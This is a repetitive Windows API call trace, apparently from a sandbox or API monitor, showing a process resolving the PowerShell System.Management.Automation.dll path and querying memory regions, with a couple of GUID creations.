	[0338.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.950] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.951] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.951] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.951] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.952] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14b800, lpBuffer=0x14c6c0, dwLength=0x30 | out: lpBuffer=0x14c6c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.953] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x75d4037d, Data2=0xf578, Data3=0x42d9, Data4=([0]=0xba, [1]=0x27, [2]=0x37, [3]=0x8, [4]=0xd3, [5]=0xaf, [6]=0x16, [7]=0x0))) returned 0x0
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.954] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xc472c08c, Data2=0x3b9f, Data3=0x4703, Data4=([0]=0xb6, [1]=0x8a, [2]=0xc3, [3]=0x18, [4]=0xa5, [5]=0x3e, [6]=0xd6, [7]=0x3d))) returned 0x0
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.957] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.958] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.959] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.959] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.959] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
